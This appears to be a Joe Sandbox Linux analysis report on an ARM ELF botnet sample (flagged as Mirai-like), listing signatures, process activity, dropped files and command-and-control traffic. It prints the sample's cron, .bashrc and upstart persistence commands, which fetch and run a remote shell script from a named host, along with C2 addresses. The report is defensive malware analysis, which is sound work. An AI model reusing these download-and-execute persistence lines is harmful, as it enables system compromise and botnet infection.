Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nsharm7.elf

Overview

General Information

Sample name:nsharm7.elf
Analysis ID:1542859
MD5:ca210ee9b185a078d977e3f9f421e2da
SHA1:99a8fdf8489095caf3ba316f5f75561400bb64d5
SHA256:d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1542859
Start date and time:2024-10-26 19:16:56 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 53s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nsharm7.elf
Detection:MAL
Classification:mal60.troj.linELF@0/3@8/0
  • VT rate limit hit for: nsharm7.elf
Command:/tmp/nsharm7.elf
PID:5549
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
/bin/sh: 1: /sbin/initctl: not found
  • system is lnxubuntu20
  • nsharm7.elf (PID: 5549, Parent: 5469, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/nsharm7.elf
    • sh (PID: 5551, Parent: 5549, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 5553, Parent: 5551)
        • sh New Fork (PID: 5555, Parent: 5553)
        • crontab (PID: 5555, Parent: 5553, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 5554, Parent: 5551)
      • crontab (PID: 5554, Parent: 5551, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • sh (PID: 5556, Parent: 5549, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/initctl start bot"
      • sh New Fork (PID: 5558, Parent: 5556)
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nsharm7.elfReversingLabs: Detection: 23%
Source: .bashrc.12.drString: cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: bot.conf.12.drString: exec cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: tmp.QYPaEb.18.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: global trafficTCP traffic: 192.168.2.15:46308 -> 88.151.195.22:8623
Source: global trafficTCP traffic: 192.168.2.15:51746 -> 81.29.149.178:19313
Source: global trafficTCP traffic: 192.168.2.15:44828 -> 193.233.193.45:20610
Source: global trafficTCP traffic: 192.168.2.15:45492 -> 91.149.218.232:11299
Source: /tmp/nsharm7.elf (PID: 5549)Socket: 127.0.0.1:1172Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.QYPaEb.18.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/3@8/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5555)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5554)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /tmp/nsharm7.elf (PID: 5549)File written: /root/.bashrcJump to behavior
Source: /usr/bin/crontab (PID: 5554)File: /var/spool/cron/crontabs/tmp.QYPaEbJump to behavior
Source: /usr/bin/crontab (PID: 5554)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nsharm7.elf (PID: 5549)File: /root/.bashrcJump to behavior
Source: /tmp/nsharm7.elf (PID: 5551)Shell command executed: /bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: /tmp/nsharm7.elf (PID: 5556)Shell command executed: /bin/sh -c "/sbin/initctl start bot"Jump to behavior
Source: submitted sampleStderr: no crontab for root/bin/sh: 1: /sbin/initctl: not found: exit code = 0
Source: /tmp/nsharm7.elf (PID: 5549)Queries kernel information via 'uname': Jump to behavior
Source: nsharm7.elf, 5549.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp, nsharm7.elf, 5559.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp, nsharm7.elf, 5601.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: nsharm7.elf, 5549.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp, nsharm7.elf, 5559.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp, nsharm7.elf, 5601.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmpBinary or memory string: Rx86_64/usr/bin/qemu-arm/tmp/nsharm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nsharm7.elf
Source: nsharm7.elf, 5549.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp, nsharm7.elf, 5559.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp, nsharm7.elf, 5601.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: nsharm7.elf, 5549.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp, nsharm7.elf, 5559.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp, nsharm7.elf, 5601.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: nsharm7.elf, 5601.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Unix Shell Configuration Modification
1
Unix Shell Configuration Modification
1
Hidden Files and Directories
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
RootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt2
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542859 Sample: nsharm7.elf Startdate: 26/10/2024 Architecture: LINUX Score: 60 38 91.149.218.232, 11299, 45492 GECKONET-ASPL Poland 2->38 40 193.233.193.45, 20610, 44828 FREE-NET-ASFREEnetEU Russian Federation 2->40 42 3 other IPs or domains 2->42 44 Multi AV Scanner detection for submitted file 2->44 9 nsharm7.elf 2->9         started        signatures3 process4 file5 36 /root/.bashrc, ASCII 9->36 dropped 50 Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions 9->50 13 nsharm7.elf sh 9->13         started        15 nsharm7.elf sh 9->15         started        17 nsharm7.elf 9->17         started        19 nsharm7.elf 9->19         started        signatures6 process7 process8 21 sh crontab 13->21         started        25 sh 13->25         started        27 sh 15->27         started        29 nsharm7.elf 17->29         started        file9 34 /var/spool/cron/crontabs/tmp.QYPaEb, ASCII 21->34 dropped 46 Sample tries to persist itself using cron 21->46 48 Executes the "crontab" command typically for achieving persistence 21->48 31 sh crontab 25->31         started        signatures10 process11 signatures12 52 Executes the "crontab" command typically for achieving persistence 31->52
SourceDetectionScannerLabelLink
nsharm7.elf24%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    unknown
    kingstonwikkerink.dyn
    81.29.149.178
    truefalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://hailcocks.ru/wget.sh;tmp.QYPaEb.18.drfalse
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        88.151.195.22
        unknownAzerbaijan
        15723AZERONLINEAZfalse
        193.233.193.45
        unknownRussian Federation
        2895FREE-NET-ASFREEnetEUfalse
        81.29.149.178
        kingstonwikkerink.dynSwitzerland
        39616COMUNICA_IT_SERVICESCHfalse
        91.149.218.232
        unknownPoland
        198401GECKONET-ASPLfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        88.151.195.22nshmpsl.elfGet hashmaliciousUnknownBrowse
          nshmips.elfGet hashmaliciousUnknownBrowse
            gmpsl.elfGet hashmaliciousUnknownBrowse
              nshsh4.elfGet hashmaliciousUnknownBrowse
                mips.elfGet hashmaliciousUnknownBrowse
                  hmips.elfGet hashmaliciousUnknownBrowse
                    arm7.elfGet hashmaliciousUnknownBrowse
                      mpsl.elfGet hashmaliciousUnknownBrowse
                        mips.elfGet hashmaliciousUnknownBrowse
                          arm5.elfGet hashmaliciousUnknownBrowse
                            193.233.193.45nshmpsl.elfGet hashmaliciousUnknownBrowse
                              nsharm.elfGet hashmaliciousUnknownBrowse
                                harm5.elfGet hashmaliciousUnknownBrowse
                                  nshsh4.elfGet hashmaliciousUnknownBrowse
                                    harm4.elfGet hashmaliciousUnknownBrowse
                                      mips.elfGet hashmaliciousUnknownBrowse
                                        hmips.elfGet hashmaliciousUnknownBrowse
                                          81.29.149.178nshmpsl.elfGet hashmaliciousUnknownBrowse
                                            nsharm.elfGet hashmaliciousUnknownBrowse
                                              nshsh4.elfGet hashmaliciousUnknownBrowse
                                                harm4.elfGet hashmaliciousUnknownBrowse
                                                  hmips.elfGet hashmaliciousUnknownBrowse
                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                      mips.elfGet hashmaliciousUnknownBrowse
                                                        arm5.elfGet hashmaliciousUnknownBrowse
                                                          91.149.218.232nshmpsl.elfGet hashmaliciousUnknownBrowse
                                                            nsharm.elfGet hashmaliciousUnknownBrowse
                                                              nshmips.elfGet hashmaliciousUnknownBrowse
                                                                nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                  nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                    harm4.elfGet hashmaliciousUnknownBrowse
                                                                      ppc.elfGet hashmaliciousUnknownBrowse
                                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          kingstonwikkerink.dynnshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.233.193.45
                                                                          nsharm.elfGet hashmaliciousUnknownBrowse
                                                                          • 195.133.92.51
                                                                          nshmips.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.233.193.45
                                                                          gmpsl.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.233.193.45
                                                                          nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                          • 185.82.200.181
                                                                          harm5.elfGet hashmaliciousUnknownBrowse
                                                                          • 213.182.204.57
                                                                          nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                          • 194.87.198.29
                                                                          harm4.elfGet hashmaliciousUnknownBrowse
                                                                          • 31.13.248.89
                                                                          mips.elfGet hashmaliciousUnknownBrowse
                                                                          • 81.29.149.178
                                                                          daisy.ubuntu.comnsharm.elfGet hashmaliciousUnknownBrowse
                                                                          • 162.213.35.25
                                                                          gmpsl.elfGet hashmaliciousUnknownBrowse
                                                                          • 162.213.35.25
                                                                          nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                          • 162.213.35.24
                                                                          harm5.elfGet hashmaliciousUnknownBrowse
                                                                          • 162.213.35.25
                                                                          sshd.elfGet hashmaliciousUnknownBrowse
                                                                          • 162.213.35.24
                                                                          nsharm6.elfGet hashmaliciousUnknownBrowse
                                                                          • 162.213.35.24
                                                                          harm4.elfGet hashmaliciousUnknownBrowse
                                                                          • 162.213.35.24
                                                                          .i.elfGet hashmaliciousUnknownBrowse
                                                                          • 162.213.35.25
                                                                          arm.elfGet hashmaliciousUnknownBrowse
                                                                          • 162.213.35.24
                                                                          c0r0n4x.arm6.elfGet hashmaliciousUnknownBrowse
                                                                          • 162.213.35.24
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          COMUNICA_IT_SERVICESCHnshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                          • 81.29.149.178
                                                                          nsharm.elfGet hashmaliciousUnknownBrowse
                                                                          • 81.29.149.178
                                                                          nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                          • 81.29.149.178
                                                                          harm4.elfGet hashmaliciousUnknownBrowse
                                                                          • 81.29.149.178
                                                                          hmips.elfGet hashmaliciousUnknownBrowse
                                                                          • 81.29.149.178
                                                                          ppc.elfGet hashmaliciousUnknownBrowse
                                                                          • 81.29.149.178
                                                                          Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 81.29.149.252
                                                                          Monetary_002993034958293.jsGet hashmaliciousUnknownBrowse
                                                                          • 81.29.149.252
                                                                          RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 81.29.149.252
                                                                          mips.elfGet hashmaliciousUnknownBrowse
                                                                          • 81.29.149.178
                                                                          GECKONET-ASPLnshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                          • 91.149.218.232
                                                                          nsharm.elfGet hashmaliciousUnknownBrowse
                                                                          • 91.149.218.232
                                                                          nshmips.elfGet hashmaliciousUnknownBrowse
                                                                          • 91.149.218.232
                                                                          nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                          • 91.149.218.232
                                                                          nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                          • 91.149.218.232
                                                                          harm4.elfGet hashmaliciousUnknownBrowse
                                                                          • 91.149.218.232
                                                                          botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 91.234.13.57
                                                                          ppc.elfGet hashmaliciousUnknownBrowse
                                                                          • 91.149.218.232
                                                                          x86.elfGet hashmaliciousUnknownBrowse
                                                                          • 91.149.218.232
                                                                          aWoyoSGAsv.elfGet hashmaliciousMiraiBrowse
                                                                          • 45.82.146.198
                                                                          AZERONLINEAZnshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                          • 88.151.195.22
                                                                          nshmips.elfGet hashmaliciousUnknownBrowse
                                                                          • 88.151.195.22
                                                                          gmpsl.elfGet hashmaliciousUnknownBrowse
                                                                          • 88.151.195.22
                                                                          nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                          • 88.151.195.22
                                                                          mips.elfGet hashmaliciousUnknownBrowse
                                                                          • 88.151.195.22
                                                                          hmips.elfGet hashmaliciousUnknownBrowse
                                                                          • 88.151.195.22
                                                                          arm7.elfGet hashmaliciousUnknownBrowse
                                                                          • 88.151.195.22
                                                                          mpsl.elfGet hashmaliciousUnknownBrowse
                                                                          • 88.151.195.22
                                                                          mips.elfGet hashmaliciousUnknownBrowse
                                                                          • 88.151.195.22
                                                                          arm5.elfGet hashmaliciousUnknownBrowse
                                                                          • 88.151.195.22
                                                                          FREE-NET-ASFREEnetEUnshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.233.193.45
                                                                          nsharm.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.233.193.45
                                                                          harm5.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.233.193.45
                                                                          nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.233.193.45
                                                                          harm4.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.233.193.45
                                                                          mips.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.233.193.45
                                                                          Rechnung_643839483.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                          • 147.45.44.131
                                                                          hmips.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.233.193.45
                                                                          5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeGet hashmaliciousStealc, VidarBrowse
                                                                          • 147.45.44.221
                                                                          http://heks.egrowbrands.com/yuop/66e9b62daa62d_xin.exeGet hashmaliciousUnknownBrowse
                                                                          • 147.45.44.104
                                                                          No context
                                                                          No context
                                                                          Process:/tmp/nsharm7.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):346
                                                                          Entropy (8bit):4.726559471748614
                                                                          Encrypted:false
                                                                          SSDEEP:6:SqEeZK8z7oXKqWFIw3CaXQw3cjICQDMFDKXsJovYL8jndFKXsJovFkTFdVOYHIaU:GeZfUX9HACcTSICQg+GABjnOGAFkROS2
                                                                          MD5:9722585F219A220A4DC2A0C49BD3B019
                                                                          SHA1:FFBA476658EA681147C570C6F2B16A79E7D38E19
                                                                          SHA-256:BB41836A1F2E11795C52739E7434247D90C0F8D391AFE759598BAA06E3657A8D
                                                                          SHA-512:77F16A70995A2650A397661D7B9CE3A83F4A5C01DC6EBC5E02B60A41D425246D37AB49478DC38EE3FC956775D90E9C86F911E0AC5E5DF6E142BCC82F8601D6E4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:# bot - My Miscellaneous Service.description "My Miscellaneous Service".start on filesystem or runlevel [2345].stop on runlevel [!2345].script. exec cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.end script.post-start script. echo "Service Started".end script.
                                                                          Process:/tmp/nsharm7.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):124
                                                                          Entropy (8bit):4.380927423351128
                                                                          Encrypted:false
                                                                          SSDEEP:3:aKVMFDEIGXjQJZWvYKQzQRFxFdljEIGXjQJZWv1SeDkiJCF9:DMFDKXsJovYL8jndFKXsJovFkTF9
                                                                          MD5:75D0F0790419BF1E1B797F768A7FD943
                                                                          SHA1:CB2B3673D8D5E7E9C6BE90C17EEE99EC7C005CC4
                                                                          SHA-256:118CC2B37583BC923A21CB5BEF6EC2E968E10886519A5614664BDE7C74628183
                                                                          SHA-512:1824A32B5178161E98599C3BD9186A52D5ED29B4BF727E3385550ABD4343DAEA43BD419DA51A11ADB958FCD0C43627C6070ECCDB480D033529FCB0AFB5A53CF1
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview:.cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                                          Process:/usr/bin/crontab
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):306
                                                                          Entropy (8bit):5.156023571745438
                                                                          Encrypted:false
                                                                          SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQkqZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJo0:8QjHig8deHLUHYC+GABjnOGAFkz
                                                                          MD5:82486729D8C5E7F3460E556463E6411A
                                                                          SHA1:EACCB72BDD251127707630AA17A366A90139F03A
                                                                          SHA-256:89E065ED9157836279A379A06D2DA0AE8623E7D8D3294AC0487F16FD0A642BC7
                                                                          SHA-512:521739E797659E779A7AB53304588A7E8BFBE55077CB64F73A963DB169C2865F60F4D21AF98579824C0EA4F1555D2F4AAEFC88245671B9F08FBF8EC52358CD61
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Oct 26 12:17:46 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                                          File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                          Entropy (8bit):6.172622310669632
                                                                          TrID:
                                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                          File name:nsharm7.elf
                                                                          File size:103'696 bytes
                                                                          MD5:ca210ee9b185a078d977e3f9f421e2da
                                                                          SHA1:99a8fdf8489095caf3ba316f5f75561400bb64d5
                                                                          SHA256:d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125
                                                                          SHA512:fbbbda938ecfd86d1f0d6f445b32631dff779a29ebc936ca6379230555c1cb3d4a81e7cceaccf382775ce584012c0750e784a9c96de11ec0b16daf6036f9d02c
                                                                          SSDEEP:3072:JTnKSqnPWkyyRebaVf4GwBLFCsfIUuFeStQjX:JTnZmWkyDbaVf4GwBRCslusSOjX
                                                                          TLSH:36A30946B9819F11D4D621FAFB9E418933136FBCE3FA7101D920AF6423CA9DB0E76512
                                                                          File Content Preview:.ELF..............(.........4...@.......4. ...(........p............ ... ................................................................b..........................................Q.td..................................-...L..................@-.,@...0....S

                                                                          ELF header

                                                                          Class:ELF32
                                                                          Data:2's complement, little endian
                                                                          Version:1 (current)
                                                                          Machine:ARM
                                                                          Version Number:0x1
                                                                          Type:EXEC (Executable file)
                                                                          OS/ABI:UNIX - System V
                                                                          ABI Version:0
                                                                          Entry Point Address:0x8194
                                                                          Flags:0x4000002
                                                                          ELF Header Size:52
                                                                          Program Header Offset:52
                                                                          Program Header Size:32
                                                                          Number of Program Headers:5
                                                                          Section Header Offset:102976
                                                                          Section Header Size:40
                                                                          Number of Section Headers:18
                                                                          Header String Table Index:17
                                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                          NULL0x00x00x00x00x0000
                                                                          .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                          .textPROGBITS0x80f00xf00x167740x00x6AX0016
                                                                          .finiPROGBITS0x1e8640x168640x100x00x6AX004
                                                                          .rodataPROGBITS0x1e8780x168780x17340x00x2A008
                                                                          .ARM.extabPROGBITS0x1ffac0x17fac0x180x00x2A004
                                                                          .ARM.exidxARM_EXIDX0x1ffc40x17fc40x1200x00x82AL204
                                                                          .eh_framePROGBITS0x280e40x180e40x40x00x3WA004
                                                                          .tbssNOBITS0x280e80x180e80x80x00x403WAT004
                                                                          .init_arrayINIT_ARRAY0x280e80x180e80x40x00x3WA004
                                                                          .fini_arrayFINI_ARRAY0x280ec0x180ec0x40x00x3WA004
                                                                          .jcrPROGBITS0x280f00x180f00x40x00x3WA004
                                                                          .gotPROGBITS0x280f40x180f40xac0x40x3WA004
                                                                          .dataPROGBITS0x281a00x181a00x22c0x00x3WA004
                                                                          .bssNOBITS0x283cc0x183cc0x5f240x00x3WA004
                                                                          .commentPROGBITS0x00x183cc0xdcc0x00x0001
                                                                          .ARM.attributesARM_ATTRIBUTES0x00x191980x160x00x0001
                                                                          .shstrtabSTRTAB0x00x191ae0x910x00x0001
                                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                          EXIDX0x17fc40x1ffc40x1ffc40x1200x1204.47930x4R 0x4.ARM.exidx
                                                                          LOAD0x00x80000x80000x180e40x180e46.14030x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                          LOAD0x180e40x280e40x280e40x2e80x620c4.09450x6RW 0x8000.eh_frame .tbss .init_array .fini_array .jcr .got .data .bss
                                                                          TLS0x180e80x280e80x280e80x00x80.00000x4R 0x4.tbss
                                                                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 26, 2024 19:17:47.914865017 CEST463088623192.168.2.1588.151.195.22
                                                                          Oct 26, 2024 19:17:47.920839071 CEST86234630888.151.195.22192.168.2.15
                                                                          Oct 26, 2024 19:17:47.920892954 CEST463088623192.168.2.1588.151.195.22
                                                                          Oct 26, 2024 19:17:47.921093941 CEST463088623192.168.2.1588.151.195.22
                                                                          Oct 26, 2024 19:17:47.926697969 CEST86234630888.151.195.22192.168.2.15
                                                                          Oct 26, 2024 19:17:47.926739931 CEST463088623192.168.2.1588.151.195.22
                                                                          Oct 26, 2024 19:17:47.932497025 CEST86234630888.151.195.22192.168.2.15
                                                                          Oct 26, 2024 19:17:48.920926094 CEST86234630888.151.195.22192.168.2.15
                                                                          Oct 26, 2024 19:17:48.921056986 CEST463088623192.168.2.1588.151.195.22
                                                                          Oct 26, 2024 19:17:48.921171904 CEST86234630888.151.195.22192.168.2.15
                                                                          Oct 26, 2024 19:17:48.921199083 CEST463088623192.168.2.1588.151.195.22
                                                                          Oct 26, 2024 19:17:48.921318054 CEST463088623192.168.2.1588.151.195.22
                                                                          Oct 26, 2024 19:17:53.936404943 CEST5174619313192.168.2.1581.29.149.178
                                                                          Oct 26, 2024 19:17:53.941946030 CEST193135174681.29.149.178192.168.2.15
                                                                          Oct 26, 2024 19:17:53.942023993 CEST5174619313192.168.2.1581.29.149.178
                                                                          Oct 26, 2024 19:17:53.942023993 CEST5174619313192.168.2.1581.29.149.178
                                                                          Oct 26, 2024 19:17:53.947429895 CEST193135174681.29.149.178192.168.2.15
                                                                          Oct 26, 2024 19:17:53.947489977 CEST5174619313192.168.2.1581.29.149.178
                                                                          Oct 26, 2024 19:17:53.952785969 CEST193135174681.29.149.178192.168.2.15
                                                                          Oct 26, 2024 19:17:54.822705984 CEST193135174681.29.149.178192.168.2.15
                                                                          Oct 26, 2024 19:17:54.822849989 CEST5174619313192.168.2.1581.29.149.178
                                                                          Oct 26, 2024 19:17:54.822963953 CEST5174619313192.168.2.1581.29.149.178
                                                                          Oct 26, 2024 19:18:04.863718987 CEST4482820610192.168.2.15193.233.193.45
                                                                          Oct 26, 2024 19:18:04.869218111 CEST2061044828193.233.193.45192.168.2.15
                                                                          Oct 26, 2024 19:18:04.869369984 CEST4482820610192.168.2.15193.233.193.45
                                                                          Oct 26, 2024 19:18:04.869369984 CEST4482820610192.168.2.15193.233.193.45
                                                                          Oct 26, 2024 19:18:04.874771118 CEST2061044828193.233.193.45192.168.2.15
                                                                          Oct 26, 2024 19:18:04.874826908 CEST4482820610192.168.2.15193.233.193.45
                                                                          Oct 26, 2024 19:18:04.880167961 CEST2061044828193.233.193.45192.168.2.15
                                                                          Oct 26, 2024 19:18:06.210983038 CEST2061044828193.233.193.45192.168.2.15
                                                                          Oct 26, 2024 19:18:06.211236954 CEST4482820610192.168.2.15193.233.193.45
                                                                          Oct 26, 2024 19:18:06.211318016 CEST4482820610192.168.2.15193.233.193.45
                                                                          Oct 26, 2024 19:18:16.253773928 CEST4549211299192.168.2.1591.149.218.232
                                                                          Oct 26, 2024 19:18:16.259500980 CEST112994549291.149.218.232192.168.2.15
                                                                          Oct 26, 2024 19:18:16.259604931 CEST4549211299192.168.2.1591.149.218.232
                                                                          Oct 26, 2024 19:18:16.259905100 CEST4549211299192.168.2.1591.149.218.232
                                                                          Oct 26, 2024 19:18:16.265319109 CEST112994549291.149.218.232192.168.2.15
                                                                          Oct 26, 2024 19:18:16.265422106 CEST4549211299192.168.2.1591.149.218.232
                                                                          Oct 26, 2024 19:18:16.270781994 CEST112994549291.149.218.232192.168.2.15
                                                                          Oct 26, 2024 19:18:26.269819021 CEST4549211299192.168.2.1591.149.218.232
                                                                          Oct 26, 2024 19:18:26.275620937 CEST112994549291.149.218.232192.168.2.15
